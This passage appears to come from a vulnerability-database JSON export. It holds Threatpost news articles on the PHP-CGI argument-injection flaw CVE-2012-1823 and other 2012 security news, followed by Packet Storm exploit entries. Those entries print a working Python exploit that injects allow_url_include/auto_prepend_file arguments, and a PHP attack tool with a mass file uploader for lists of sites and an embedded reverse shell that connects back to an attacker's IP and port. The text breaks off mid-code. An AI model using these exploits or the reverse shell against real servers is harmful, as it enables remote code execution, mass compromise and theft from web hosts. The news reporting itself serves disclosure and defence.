you may be vulnerable. To see if you are, just add ?-s to the end of any of your URLs. If you see your source code, you are vulnerable. If your site renders normally, you are not.\n\nThe PHP developers said that while the new versions of the language should work for most users, it may not be feasible for some users to update much older versions of PHP. In that case, users can deploy a workaround.\n\n\u201cAn alternative is to configure your web server to not let these types of requests with query strings starting with a \u201c-\u201d and not containing a \u201c=\u201d through. Adding a rule like this should not break any sites,\u201d they said.\n", "modified": "2013-04-17T16:32:18", "published": "2012-05-04T14:26:46", "id": "THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "href": "https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/76524/", "type": "threatpost", "title": "PHP Group Releases New Versions, But Patch Doesn't Fix CVE-2012-1823 Bug", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:06", "bulletinFamily": "info", "description": "For the second time in less than a week, the developers of PHP have released new versions of the language that include a fix for the remotely exploitable vulnerability that was disclosed last week. The group is encouraging users to upgrade to PHP 5.4.3 or 5.3.13 immediately. \n\nThe [vulnerability affects PHP](<https://threatpost.com/another-set-php-releases-pushed-out-fix-cve-2012-1823-flaw-050912/>) sites in CGI-based setups and can enable an attacker to get access to the site\u2019s source code by passing certain queries to the PHP binary as command-line arguments. The bug was disclosed last week before a patch was available through a mistake in the PHP Group\u2019s internal bug-handling system.\n\n\u201cThe PHP development team would like to announce the immediate availability of PHP 5.4.3 and PHP 5.3.13. All users are encouraged to upgrade to PHP 5.4.3 or PHP 5.3.13\n\nThe releases complete a fix for a [vulnerability](<http://www.php.net/archive/2012.php#id2012-05-03-1>) in CGI-based setups (CVE-2012-2311). _Note: mod_php and php-fpm are not vulnerable to this attack,\u201d _the PHP developers said.\n\n\u201cPHP 5.4.3 fixes a buffer overflow vulnerability in the [apache_request_headers()](<http://php.net/manual/function.apache-request-headers.php>) (CVE-2012-2329). The PHP 5.3 series is not vulnerable to this issue.\u201d\n\nThe PHP Group [released a fix for the bug](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>) late last week, but the researchers who discovered the flaw originally found that the new versions didn\u2019t completely address the problem and still left vulnerable sites exposed to attack. There are mitigations available for the bug, as explained by the [Eindbazen](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>) team that found the flaw, but users should upgrade their installations as soon as they can.\n", "modified": "2013-04-17T16:32:16", "published": "2012-05-09T14:32:23", "id": "THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "href": "https://threatpost.com/another-set-php-releases-pushed-out-fix-cve-2012-1823-flaw-050912/76544/", "type": "threatpost", "title": "Another Set of PHP Releases Pushed Out to Fix CVE-2012-1823 Flaw", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:08", "bulletinFamily": "info", "description": "A report by the Federal Emergency Management Agency (FEMA) finds that state and local government officials in the U.S. are pessimistic about their ability to respond to a cyberattacks.\n\nThe National Preparedness Report (NPR) was commissioned by the Obama Administration. It found that, although the United States\u2019 \u201cportfolio of preparedness capabilities\u201d has improved significantly in the post-9/11 era. Planning, cybersecurity was a \u201cnational area for improvement.\u201dDespite the nation\u2019s increased dependence on technology, certain stakeholders don\u2019t properly understand the risks posed by cyber attack. In self-assessments, many states indicated that cybersecurity was the arena in which they possessed the lowest capability level.\n\nProblematically, the NPR cites the DHS\u2019s 2011 Nationwide Cybersecurity Review, which highlighted gaps in the cyber-preparedness of 162 state and local entities. In that review, 45 percent of respondents admitted to not having a formal risk management program in place. In addition to that, two-thirds of respondents claimed that they had not updated their information security or disaster recovery plans in at least two years.\n\nAccording to findings from the U.S. Computer Emergency Readiness Team, there has been a 650 percent increase in cyber incidents over the past five years. Two-thirds of American firms admit to having been the victim of a data breach or other cybersecurity incident. Worse yet, just half of the owners and operators of high-priority facilities that responded in the Enhanced Critical Infrastructure Protection (ECIP) security survey said they report cyber incidents to third parties.\n\n[The New York Times notes](<http://www.nytimes.com/2012/05/04/us/politics/study-finds-concerns-on-readiness-for-cyberattacks.html?_r=1>) that the Obama Administration is attempting to push a bill through the Senate that would grant authorities to the DHS to issue regulations that would protect critical infrastructure.\n\nOf course, [the House recently passed the Cyber Information Sharing and Protection Act](<https://threatpost.com/cispa-passes-house-cacophony-groans-and-cheers-042712/>), but the Obama Administration has made clear its intention to veto that piece of legislation if it makes it through the Senate and to the President\u2019s desk.\n\nYou can download the FEMA report [here](<http://www.fema.gov/prepared/ppd8.shtm>).\n", "modified": "2013-04-17T20:03:35", "published": "2012-05-04T15:25:34", "id": "THREATPOST:D5EC8CB37BD901EEB297B27AA18015A9", "href": "https://threatpost.com/fema-state-local-officials-not-prepared-respond-cyberattack-050412/76525/", "type": "threatpost", "title": "FEMA: State, Local Officials Not Prepared to Respond to Cyberattack", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:07", "bulletinFamily": "info", "description": "The U.S.\u2019s Cyber Command is using special, classified briefings with private sector CEOs to scare them into greater vigilance about the threat of cyber attacks, according to an NPR report.\n\nThe report, quoting unnamed participants in the classified, 2010 briefings said that government officials including Cyber Command Chief Gen. Keith Alexander and representatives from DoD, DHS and office of the Director of National Intelligence \u201cscared the bejeezus\u201d out of CEOs from leading technology firms like Dell and HP.\n\nThe briefings were part of a three year-old program dubbed the \u201cEnduring Security Framework\u201d that was designed to foster closer coordination between private sector executives and Washington. According to [the NPR report](<http://m.npr.org/news/front/152296621?page=3>), the executives are granted a temporary, one-day classified clearance and treated to a peak under the cover at some of the offensive cyber tools that are at the disposal of cyber warriors at the NSA, CIA and the Pentagon. The idea, according to public testimony by Alexander and Mike McConnell, the former U.S. director of national intelligence, is to show what the U.S.\u2019s cyber offensive capabilities are, with an eye to preparing private firms for what might be [leveraged against them by nation-backed attackers](<http://m.npr.org/news/front/152296621?page=2>).\n\nAmong the attacks highlighted by government officials was a firmware based attack that could \u201cbrick\u201d hardware by leading manufacturers, the sources told NPR.\n\nLegislation pending on Capitol Hill, including the recently defeated SOPA (Stop Online Piracy Act) and the [controversial Cyber Intelligence Sharing and Protection Act (CISPA)](<https://threatpost.com/cispa-passes-house-cacophony-groans-and-cheers-042712/>) provide new mechanisms for information sharing between the government and private entitites. However, privacy advocates such as the Center for Democracy and Technology have expressed consern about the bills\u2019 support for wide ranging, warrantless government surveillance of ordinary citizens. \n", "modified": "2013-04-17T16:32:16", "published": "2012-05-09T18:39:14", "id": "THREATPOST:51FB010AA47AEB7BA9A071B3DC8D9989", "href": "https://threatpost.com/us-cyber-command-using-classified-intel-scare-ceos-action-050912/76545/", "type": "threatpost", "title": "U.S. Cyber Command Using Classified Intel To Scare CEOs To Action", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:59:10", "bulletinFamily": "info", "description": "Close to two years ago, a [serious vulnerability in PHP was accidentally disclosed](<http://threatpost.com/serious-remote-php-bug-accidentally-disclosed-050312/76517>) after it was discovered months prior during a hacking contest. A patch was released in relatively short order, and one would assume that given PHP\u2019s prevalence as a web development framework, the fix would have been applied just as quickly.\n\nBut given the discovery last October of a new set of exploits for [CVE-2012-1823](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>), that assumption may not be correct.\n\nResearchers at [Imperva ](<http://blog.imperva.com/2014/03/threat-advisory-php-cgi-at-your-command.html>)have been watching since Oct. 29 attacks exploiting the PHP bug. Attackers were using the new exploit to deliver arbitrary code to websites running PHP 5.4.x, 5.3.x before 5.4.2 or 5.3.12; those vulnerable versions account for about 16 percent of the sites on the web according to director of security research Barry Shteiman.\n\nThe new exploits were dangerous in that they allowed hackers to abuse an old vulnerability to not only run arbitrary code, but also adapt techniques found in botnets and crimeware kits to inject malware, steal credentials or system data from the server, or move laterally within the data center.\n\n\u201cNot only are we seeing a vulnerability used after it was released so long ago, but what we\u2019re seeing is attackers and professional hackers understanding what vendors understand\u2014people just don\u2019t patch,\u201d Shteiman said. \u201cThey can\u2019t or won\u2019t or are not minded to fix these problems.\u201d\n\nPHP is found on nearly 82 percent of websites today; these attacks target sites where PHP is running with CGI as an option, creating a condition that allows for code execution from the outside. Shteiman said the vulnerability affects a built-in mechanism in PHP that protects itself from exposing files and commands. A configuration flaw allows hackers to first disable the security mechanism, which in turn allows a hacker to run remote code or arbitrarily inject code.\n\n\u201cWith the new exploit, it\u2019s the same relative technique, but what we\u2019ve seen is a lot of automation,\u201d Shteiman said. \u201cThe tool that attacked these systems is running an interesting subset of dictionaries that requires an attacker know where PHP is installed on the server. We\u2019ve seen attackers trying different paths to see which backend contains the [PHP] executable.\u201d\n\nThe big-picture problem is the number of PHP websites still running vulnerable code despite the availability of a patch for close to two years now.\n\n\u201cPHP is installed as an interpreter,\u201d Shteiman said. \u201cReplacing the existing instance of PHP with a new one means downtime. Sometimes you may have to change applications because some things that are now deprecated may require application changes. For that reason, sometimes organizations don\u2019t patch or go a different route. They might use a new framework instead.\u201d\n\nOriginal reports on the vulnerability triggered advisories from a number of organizations, including US-CERT. The bug is a relatively simple one; researchers found that when they passed a specific query string that contained the -s command to PHP in a CGI setup, PHP would interpret the -s as the command line argument and result in the disclosure of the source code for the application. They extended their testing and found they could pass whatever command-line arguments they wanted to the PHP binary.\n\n\u201cYou\u2019d think these bugs would be long forgotten, but it isn\u2019t so; they\u2019re like the undead. Vulnerabilities never die,\u201d Shteiman said. \u201cThey don\u2019t die and we realize if we see this executed by botnets trying to onboard servers and by crimeware kits being sold, that means attackers understand they can rely on old problems because people won\u2019t fix them and attackers don\u2019t have to work too hard.\u201d\n", "modified": "2014-03-19T16:12:20", "published": "2014-03-19T12:12:20", "id": "THREATPOST:A5E5D5921DAB8BB3CACFA91664901B61", "href": "https://threatpost.com/new-exploits-arrive-for-old-php-vulnerability/104881/", "type": "threatpost", "title": "Exploits for Two-Year-Old PHP Security Vulnerability Found", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:06", "bulletinFamily": "info", "description": "Carrier IQ, a startup heavily bruised last fall by harsh criticism of its handset diagnostic software, today announced it\u2019s hired a high-profile lawyer as its Chief Privacy Officer.\n\nAccording to [a news release](<http://finance.yahoo.com/news/carrier-iq-appoints-former-verizon-120000598.html>), Magnolia Mansourkia Mobley, a CIPP and former Verizon executive, will be tasked with quickly broadening the company\u2019s focus on consumer privacy. She also was named the company\u2019s General Counsel.\n\n\u201cShe has the perfect blend of privacy leadership, specific market knowledge and relationships, and legal acumen. This will enable us to further grow and complement our expanding customer objectives,\u201d said Larry Lenhart, CEO of Carrier IQ, in a prepared statement.\n\nThe company became the flashpoint in a heated controversy after initial reports its analytics software, embedded in some 150 mobile phones, was capable of gathering a great deal of personal data without the customer\u2019s consent.\n\nThe New Orleans-based Carrier IQ defended its technology\u2019s primary purpose to help troubleshoot support tickets, such as connectivity and battery issues in smartphones. It also said the carriers determine what data is collected and stored, such as how third-party applications are faring. Following an initial report that the software logged user information like browsing histories and locations, other security researchers dove into the technology and concluded that the software was capable of collecting such private data, but there was little evidence it had done so.\n\nStill, security concerns remain around potential data leakage and malware attacks, given how many devices carry the technology. \n\nIn making today\u2019s announcement, the company took another step towards repairing its reputation.\n\nIt\u2019s new Chief Privacy Officer is a 12-year veterane of Verizon, she was its VP and Assistant General Counsel in charge of privacy, where she drove a culture of privacy across the organization. \u201cHer consumer privacy leadership was instrumental in helping secure a coveted place among the top 20 companies in the \u2018Most Trusted Companies for Privacy\u2019 \u2013 as ranked by an independent TRUSTe/Ponemon Institute survey,\u201d according to the news release. \u201cMs. Mansourkia Mobley has a proven track record in privacy, including development of comprehensive privacy compliance programs, consumer privacy policies and best practices, and representing her clients before state and federal regulators on privacy, security and other Internet policy matters.\u201d\n", "modified": "2013-04-17T16:32:17", "published": "2012-05-09T03:15:14", "id": "THREATPOST:8373133ADE8051980B6223ED1B2EBEF3", "href": "https://threatpost.com/carrier-iq-hires-chief-privacy-officer-050812/76543/", "type": "threatpost", "title": "Carrier IQ Hires a Chief Privacy Officer", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:09", "bulletinFamily": "info", "description": "[](<https://threatpost.com/leaders-china-us-meet-agree-rally-against-cyber-threats-050812/>)In an attempt to clear the cybersecurity air, the United States and the People\u2019s Republic of China agreed Monday to work in tandem to prevent future cyber threats. Meeting at the Pentagon, Defense Secretary Leon Panetta and General Liang Guanglie, China\u2019s Minister of National Defense, insisted the two nations should be seen as equals and according to Guanglie, \u201cbuild a new state-to-state relationship that\u2019s not a stereotype of two major powers predestined for conflict.\u201d\n\nPanetta echoed these sentiments and went on to cite both countries\u2019 advanced technological capabilities as an advantage in preventing future crises.\n\nA report from the [Associated Press](<http://news.yahoo.com/us-china-cooperate-more-cyber-threat-224849178.html>) notes that Guanglie\u2019s trip was the first of any Chinese defense minister to Washington since 2003. Guanglie was supposed to visit the U.S. last year but the trip was postponed after Obama announced plans to sell weapons to Taiwan, [angering China](<http://in.reuters.com/article/2011/09/22/idINIndia-59499720110922>).\n\nThe visit [comes about six months](<https://threatpost.com/report-us-accuses-china-russia-cyber-espionage-110311/>) after the United States\u2019 strongest implication that China was to blame for launching a series of cyberattacks against the U.S. and other Western nations.\n\nIn a report, \u201cForeign Spies Stealing US Economic Secrets in Cyberspace,\u201d the Office of the National Counterintelligence Executive reasoned that China had initiated aggressive cyber espionage campaigns against US firms, backing up their claims with research from the Federal Bureau of Investigation, National Security Agency and the Central Intelligence Agency.\n\nGuanglie didn\u2019t directly reference the report during his visit but did support his country, claiming that it wasn\u2019t possible to attribute China to all of the cyberattacks that hit the U.S.\n\nIn the past year, attacks, allgedly from China, have hit the [U.S. Chamber of Commerce](<https://threatpost.com/hackers-china-target-hit-us-chamber-commerce-122111/>), [Google and other Western firms](<https://threatpost.com/hbgary-e-mails-dupont-other-firms-hit-aurora-attack-031011/>).\n\n*Image via the Secretary of Defense\u2019s [Flickr photostream](<http://www.flickr.com/photos/secdef/>), Creative Commons\n", "modified": "2013-04-17T16:32:17", "published": "2012-05-08T17:24:22", "id": "THREATPOST:2FB93CCBD166A84F825AED5B7F560EAD", "href": "https://threatpost.com/leaders-china-us-meet-agree-rally-against-cyber-threats-050812/76538/", "type": "threatpost", "title": "Leaders from China, U.S. Meet, Agree to Rally Against Cyber Threats", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:08", "bulletinFamily": "info", "description": "Apple has patched several serious security bugs in iOS with the release of version 5.1.1 of the mobile operating system. The most serious of the security vulnerabilities could be used for remote code execution.\n\nThe highest severity vulnerability that\u2019s fixed in iOS 5.1.1 is a WebKit flaw that can lead to remote code execution or an application crashing. In order to trigger that vulnerability, a user would need to visit a Web site with a maliciously crafted URL, which is a common attack tactic via phishing emails and URL redirections.\n\nThere is a second WebKit flaw that\u2019s fixed in this release of iOS, as well. This one was used as part of [Google\u2019s Pwnium contest](<https://threatpost.com/google-hands-out-60k-reward-full-chrome-compromise-pwnium-contest-030712/>) at CanSecWest in March by security researcher Sergey Glazunov. It\u2019s less severe than the first WebKit flaw, and can only lead to a cross-site scripting attack.\n\nThe third vulnerability fixed in this release of iOS is a URL-spoofing bug in Safari.\n\n\u201cA URL spoofing issue existed in Safari. This could be used in a malicious web site to direct the user to a spoofed site that visually appeared to be a legitimate domain. This issue is addressed through improved URL handling. This issue does not affect OS X systems,\u201d Apple said in its [advisory](<http://support.apple.com/kb/HT5278>). \n\nThe new version of iOS is available for iPhones, iPads and iPod Touch devices. \n", "modified": "2013-04-17T16:32:17", "published": "2012-05-08T13:49:34", "id": "THREATPOST:2ED66EF5DD7C982DF96F2B1625E26ABB", "href": "https://threatpost.com/apple-fixes-serious-flaws-ios-511-050812/76536/", "type": "threatpost", "title": "Apple Fixes Serious Flaws in iOS 5.1.1", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:10", "bulletinFamily": "info", "description": "A serious remote-code execution vulnerability in PHP was accidentally disclosed Wednesday, leading to fears of an outbreak of attacks on sites that were built using vulnerable versions of PHP. The bug has been known privately since January when a team of researchers used it in a capture the flag contest and then subsequently reported it to the PHP Group. The developers were still in the process of building the patch for the flaw when it was disclosed Wednesday.\n\nThe vulnerability is a simple one but it has serious consequences. Essentially, the researchers found that when they passed a specific query string that contained the -s command to PHP in a CGI setup, PHP would interpret the -s as the command line argument and result in the disclosure of the source code for the application. They extended their testing and found they could pass whatever command-line arguments they wanted ot the PHP binary.\n\n\u201cWhen PHP is used in a CGI-based setup (such as Apache\u2019s`mod_cgid`), the `php-cgi` receives a processed query string parameter as command line arguments which allows command-line switches, such as `-s, -d or -c` to be passed to the `php-cgi` binary, which can be exploited to disclose source code and obtain arbitrary code execution,\u201d the [US-CERT](<http://www.kb.cert.org/vuls/id/520827>) said in an advisory published Wednesday. \u201cA remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server.\u201d\n\nThe team that found the bug, known as Eindbazen, said that they had been waiting for several months for the PHP Group to release a patch for the vulnerability in order to publish information about the bug. However, someone accidentally marked an internal PHP bug as public and it eventually was posted to Reddit. So Eindbazen then published the details of their findings and how it can be exploited. \n\n\u201cWe\u2019ve tested this and have confirmed that the query parameters are passed to the php5-cgi binary in this configuration. Since the wrapper script merely passes all the arguments on to the actual php-cgi binary, the same problem exists with configurations where php-cgi is directly copied into the cgi-bin directory. It\u2019s interesting to note that while slashes get added to any shell metacharacters we pass in the query string, spaces and dashes (\u2018-\u2019) are not escaped. So we can pass as many options to PHP as we want!\u201d they wrote in their analysis of the [PHP CVE-2012-1823 vulnerability](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>). \n\n\u201cThere is one slight complication: php5-cgi behaves differently depending on which environment variables have been set, disabling the flag -r for direct code execution among others. However, this can be trivially bypassed. We\u2019re removing the remote code execution PoC out of an abundance of caution, but at this point anyone should be able to figure this out. And for the record: safe_mode, allow_url_include and other security-related ini settings will not save you.\u201d\n\nPHP is one of the more popular scripting languages used in Web development. Since the time that the Eindbazen team reported the bug to the PHP Group, there have been several new versions of the language released, with various other security fixes, but without a patch for the CVE-2012-1863 bug. Right now, there is no patch available for the flaw discovered by the Eindbazen team, however they list a couple of technical workarounds in their post and have produced a file that includes both of them that users can [download](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>). \n", "modified": "2013-04-17T16:32:19", "published": "2012-05-03T14:09:27", "id": "THREATPOST:219EFB4DE8A56286E444E303B599B79C", "href": "https://threatpost.com/serious-remote-php-bug-accidentally-disclosed-050312/76517/", "type": "threatpost", "title": "Serious Remote PHP Bug Accidentally Disclosed", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:20", "bulletinFamily": "exploit", "description": "", "modified": "2012-05-06T00:00:00", "published": "2012-05-06T00:00:00", "href": "https://packetstormsecurity.com/files/112486/PHP-CGI-Injection.html", "id": "PACKETSTORM:112486", "type": "packetstorm", "title": "PHP CGI Injection ", "sourceData": "`###################################################################################### \n# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit \n# Date: May 4, 2012 \n# Author: rayh4c[0x40]80sec[0x2e]com \n# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com \n###################################################################################### \n \nimport socket \nimport sys \n \ndef cgi_exploit(): \npwn_code = \"\"\"<?php phpinfo();?>\"\"\" \npost_Length = len(pwn_code) \nhttp_raw=\"\"\"POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1 \nHost: %s \nContent-Type: application/x-www-form-urlencoded \nContent-Length: %s \n \n%s \n\"\"\" %(HOST , post_Length ,pwn_code) \nprint http_raw \ntry: \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.connect((HOST, int(PORT))) \nsock.send(http_raw) \ndata = sock.recv(10000) \nprint repr(data) \nsock.close() \nexcept socket.error, msg: \nsys.stderr.write(\"[ERROR] %s\\n\" % msg[1]) \nsys.exit(1) \n \nif __name__ == '__main__': \ntry: \nHOST = sys.argv[1] \nPORT = sys.argv[2] \ncgi_exploit() \nexcept IndexError: \nprint '[+]Usage: cgi_test.py site.com 80' \nsys.exit(-1) \n \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112486/phpcgi-inject.txt"}, {"lastseen": "2016-12-05T22:23:39", "bulletinFamily": "exploit", "description": "", "modified": "2012-05-22T00:00:00", "published": "2012-05-22T00:00:00", "href": "https://packetstormsecurity.com/files/112971/PHP-CGI-Argument-Injection.html", "id": "PACKETSTORM:112971", "type": "packetstorm", "title": "PHP CGI Argument Injection", "sourceData": "`<?php \n \n######################################### www.bugreport.ir \n######################################## \n# \n# Title: PHP CGI Argument Injection Remote Exploit \nV0.3 - PHP Version \n# Vendor: http://www.php.net \n# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2 \n# Exploitation: Remote \n# Original Advisory: \nhttp://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ \n# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm \n# CVE: CVE-2012-1823 \n# Coded By: Mostafa Azizi (admin[@]0-Day[dot]net) \n################################################################################################### \n \n/* This tool may be used for legal purposes only. Users take full \nresponsibility for any actions performed using this tool. \nThe author accepts no liability for damage caused by this tool. If \nthese terms are not acceptable to you, then do not use this tool.*/ \n \nerror_reporting(0); \nini_set(\"max_execution_time\",0); \nini_set(\"default_socket_timeout\", 10); \nob_implicit_flush (1); \n \necho'<html> \n<head> \n<title>PHP CGI Argument Injection Remote Exploit</title> \n</head> \n<p align=\"center\"><font size=\"4\" color=\"#5E767E\">PHP CGI Argument \nInjection</font></p> \n<p align=\"center\"><font size=\"3\" color=\"#4E8975\">Coded by: Mostafa \nAzizi (admin[@]0-Day[dot]net)</font></p> \n<body bgcolor=\"#00000\"> \n<table align=\"center\" border=\"5\"> \n<tr> \n<th><p align=\"center\"><font size=\"4\" color=\"#8BB381\">Mass File \nUploader</font></p> \n</th> \n<th></th> \n<th><p align=\"center\"><font size=\"4\" color=\"#8BB381\">Reverse \nShell</font></p> \n</th> \n</tr> \n<tr> \n<td><form name=\"form1\" action=\"'.$SERVER[PHP_SELF].'\" \nenctype=\"multipart/form-data\" method=\"post\"> \n</br> \n<p></font><font color=\"#FFF8C6\" >Please specify a file to \nscan: </font></br><input type=\"file\" name=\"listfile\" \nsize=\"40\"><font color=\"#FF0000\"> * </font> \n<p></font><font color=\"#FFF8C6\" >Please specify a file to \nupload: </font></br><input type=\"file\" name=\"datafile\" \nsize=\"40\"><font color=\"#FF0000\"> * </font> \n<p><font color=\"#FFF8C6\" > specify a port (default is 80): \n</font></br><input name=\"port\" size=\"20\"><span \nclass=\"Stile5\"></span></p> \n<p><font color=\"#FFF8C6\" > Proxy (ip:port): \n</font></br><input name=\"proxy\" size=\"20\"><span \nclass=\"Stile5\"></span></p> \n<p align=\"center\"> <span class=\"Stile5\"><font \ncolor=\"#FF0000\">* </font><font color=\"white\" >fields are \nrequired</font></font></span></p> \n</br> \n<p align=\"center\"><input type=\"submit\" value=\"Start Attack\" \nname=\"Submit\"></p> \n</form> </td> \n<td></td> \n<td><form name=\"form1\" action=\"'.$SERVER[PHP_SELF].'\" \nenctype=\"multipart/form-data\" method=\"post\"> \n</br> \n<p></font><font color=\"#FFF8C6\" > hostname (ex: \nwww.sitename.com):</font></br><input name=\"host\" size=\"20\"> <span \nclass=\"Stile5\"></span></p> \n<p></font><font color=\"#FFF8C6\" > Your IP (ex: \n173.194.35.169 ): </font></br><input name=\"lip\" size=\"20\"> \n<span class=\"Stile5\"></span></p> \n<p><font color=\"#FFF8C6\" > Your Port (ex: \n80):</font></br><input name=\"lport\" size=\"20\"> <span \nclass=\"Stile5\"></span></p> \n</br></br> \n<p align=\"center\"> <span class=\"Stile5\"><font \ncolor=\"#FF0000\">All </font><font color=\"white\" >fields are \nrequired</font></font></span></p> \n</br> \n<p align=\"center\"><input type=\"submit\" value=\"Start Attack\" \nname=\"Submit2\"></p> \n</form> </td> \n</tr> \n</table> \n</font> \n<table width=\"90%\"> \n<tbody> \n<tr> \n<td width=\"43%\" align=\"left\"> \n \n</td> \n</tr> \n</tbody> \n</table> \n</body></html>'; \n \n$host = $_POST['host']; \n$lip = $_POST['lip']; \n$lport = $_POST['lport']; \n$port = $_POST['port']; \n$proxy = $_POST['proxy']; \n$list = file($_FILES['listfile']['tmp_name']); \n$file = \nbase64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name']))); \n$shell = \"gzinflate(base64_decode(\\\"$file\\\"))\"; \n \nif (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '') \n{ \n/*pentestmonkey's php-reverse-shell. \nLimitations: proc_open and stream_set_blocking require PHP version \n4.3+, or 5+ */ \n \n/* Connect Back */ \n \n$payload = \"<?php set_time_limit (0); \\$VERSION = \\\"1.0\\\"; \\$ip = \n'$lip'; \\$port = $lport; \\$chunk_size = 1400; \\$write_a = null; \n\\$error_a = null; \\$shell = 'uname -a; w; id; /bin/sh -i'; \\$daemon = \n0;\\$debug = 0; if (function_exists('pcntl_fork')) { \\$pid = \npcntl_fork(); if (\\$pid == -1) { printit(\\\"ERROR: Can't fork\\\"); \nexit(1);} if (\\$pid) { exit(0);} if (posix_setsid() == -1) { \nprintit(\\\"Error: Can't setsid()\\\"); exit(1); } \\$daemon = 1;} else { \nprintit(\\\"WARNING: Failed to daemonise. This is quite common and not \nfatal.\\\");}chdir(\\\"/\\\"); umask(0); \\$sock = fsockopen(\\$ip, \\$port, \n\\$errno, \\$errstr, 30);if (!\\$sock) { printit(\\\"\\$errstr (\\$errno)\\\"); \nexit(1);} \\$descriptorspec = array(0 => array(\\\"pipe\\\", \\\"r\\\"),1 => \narray(\\\"pipe\\\", \\\"w\\\"), 2 => array(\\\"pipe\\\", \\\"w\\\"));\\$process = \nproc_open(\\$shell, \\$descriptorspec, \\$pipes);if \n(!is_resource(\\$process)) { printit(\\\"ERROR: Can't spawn shell\\\"); \nexit(1);}stream_set_blocking(\\$pipes[0], \n0);stream_set_blocking(\\$pipes[1], 0);stream_set_blocking(\\$pipes[2], \n0);stream_set_blocking(\\$sock, 0);printit(\\\"Successfully opened \nreverse shell to \\$ip:\\$port\\\"); while (1) { if (feof(\\$sock)) { \nprintit(\\\"ERROR: Shell connection terminated\\\"); break;} if \n(feof(\\$pipes[1])) {printit(\\\"ERROR: Shell process \nterminated\\\");break;}\\$read_a = array(\\$sock, \\$pipes[1], \n\\$pipes[2]);\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a, \n\\$error_a, null);if (in_array(\\$sock, \\$read_a)) {if (\\$debug) \nprintit(\\\"SOCK READ\\\");\\$input = fread(\\$sock, \n\\$chunk_size);if(\\$debug) printit(\\\"SOCK: \n\\$input\\\");fwrite(\\$pipes[0], \\$input);}if (in_array(\\$pipes[1], \n\\$read_a)) {if (\\$debug) printit(\\\"STDOUT READ\\\");\\$input = \nfread(\\$pipes[1], \\$chunk_size);if (\\$debug) printit(\\\"STDOUT: \n\\$input\\\");fwrite(\\$sock, \\$input);}if (in_array(\\$pipes[2], \n\\$read_a)) {if (\\$debug) printit(\\\"STDERR READ\\\");\\$input = \nfread(\\$pipes[2], \\$chunk_size); if (\\$debug) printit(\\\"STDERR: \n\\$input\\\");fwrite(\\$sock, \n\\$input);}}fclose(\\$sock);fclose(\\$pipes[0]);fclose(\\$pipes[1]);fclose(\\$pipes[2]);proc_close(\\$process);function printit (\\$string) {if (!\\$daemon) {print \\\"\\$string\\n\\\";}} \n?>\"; \n$packet = \"POST \n\".$p.\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input \nHTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: PHP CGI Argument Injection Exploiter\\r\\n\"; \n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\\r\\n\"; \n$packet .= $payload.\"\\r\\n\\r\\n\\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n \n}elseif (isset($_POST['Submit']) && $list != '' && $file != '') \n{ \nif ($port=='') {$port=80;} \n \nfor ($n =0; $n < count($list); $n++) \n{ \n \n$siteAddbackup = $list[$n]; \n$siteAdd=str_replace(\"http://\",\"\",$siteAddbackup); \n \npreg_match('/^(?:(?:http|https):\\/\\/)?[^\\/]+(\\/.+\\/)[^\\/\\.]+\\.[^\\/\\.]+$/i',$siteAddbackup, \n$match); \n$path = $match[1]; \n$pa = strstr(trim($siteAdd),$path); \n$host=trim(str_replace($pa,\"\",$siteAdd)); \nif ($path 